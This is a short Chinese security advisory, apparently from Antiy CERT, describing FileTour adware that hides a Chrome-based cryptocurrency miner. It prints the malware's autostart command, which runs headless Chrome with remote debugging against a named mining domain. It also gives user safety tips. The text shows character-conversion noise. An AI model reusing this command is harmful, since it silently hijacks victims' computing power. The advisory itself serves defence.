近日，安天 CERT 在梳理網(wǎng)絡(luò)安全事 件時(shí)發(fā)現(xiàn)一款偽裝正常頁(yè)面并在后臺(tái)靜默 挖礦的廣告軟件 FileTour。

     FileTour 是一種廣告軟件，通常作為 游戲和其他軟件的破解或欺騙手段進(jìn)行傳 播。它被認(rèn)為是介于廣告軟件和 PUP 以 及更危險(xiǎn)的計(jì)算機(jī)惡意代碼（如密碼竊取 木馬和挖礦木馬）之間的一款軟件而臭 名昭著。此廣告件運(yùn)行后設(shè)置自啟動(dòng)， 當(dāng)用戶登錄到 Windows 時(shí)，它會(huì)自動(dòng)啟 動(dòng) Chrome 并連接到瀏覽器內(nèi)的挖礦頁(yè) 面，它是以一種讓用戶看不到 Chrome 的 方式來(lái)實(shí)現(xiàn)的。用戶登錄 Windows 時(shí)用 于 啟 動(dòng) Chrome 的 命 令 是：“C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --headless --disablegpu --remote-debugging-port=9222 https://de-mi-nis-ner2.info/cdn-41. html?t=0.4”。該命令將導(dǎo)致 Chrome 以不 可見(jiàn)的無(wú)頭狀態(tài)打開(kāi)，無(wú)需 GPU 硬件加 速即可以在端口 9222 上啟用遠(yuǎn)程調(diào)試，并 自動(dòng)連接到“https://de-mi-nis-ner2.info/ cdn-41.html?t=0.4”。當(dāng)瀏覽器在后臺(tái)打 開(kāi)此頁(yè)面時(shí)，它將執(zhí)行嵌入式 JavaScript， 以啟動(dòng)挖礦腳本，導(dǎo)致 Chrome 在任務(wù)管 理器中達(dá)到 70-80％的 CPU 利用率，這 都是因?yàn)樗鼤?huì)在后臺(tái)靜默挖礦。大多數(shù)人 甚至不會(huì)注意到他們感染了惡意代碼。他 們可能會(huì)感覺(jué)電腦變慢，有些人可能會(huì)檢 查任務(wù)管理器，并注意到 Chrome 的奇怪行為，但對(duì)于大多數(shù)用戶而言，該挖礦腳 本可以運(yùn)行很長(zhǎng)時(shí)間而不被檢測(cè)到。

     安天 CERT 提醒廣大網(wǎng)絡(luò)使用者，可 以在 Chrome 中使用 adblocker 插件，這會(huì) 阻止瀏覽器內(nèi)的挖礦腳本。要提高網(wǎng)絡(luò)安 全意識(shí)，在日常工作中要及時(shí)進(jìn)行系統(tǒng)更 新和漏洞修復(fù)，不要隨意下載非正版的應(yīng) 用軟件、非官方游戲、注冊(cè)機(jī)等。收發(fā)郵 件時(shí)要確認(rèn)收發(fā)來(lái)源是否可靠，更加不要 隨意點(diǎn)擊或者復(fù)制郵件中的網(wǎng)址，不要輕 易下載來(lái)源不明的附件，發(fā)現(xiàn)網(wǎng)絡(luò)異常要 提高警惕并及時(shí)采取應(yīng)對(duì)措施，養(yǎng)成及時(shí) 更新操作系統(tǒng)和軟件應(yīng)用的好習(xí)慣。

     目前，安天追影產(chǎn)品已經(jīng)實(shí)現(xiàn)了對(duì)該 類惡意代碼的檢出。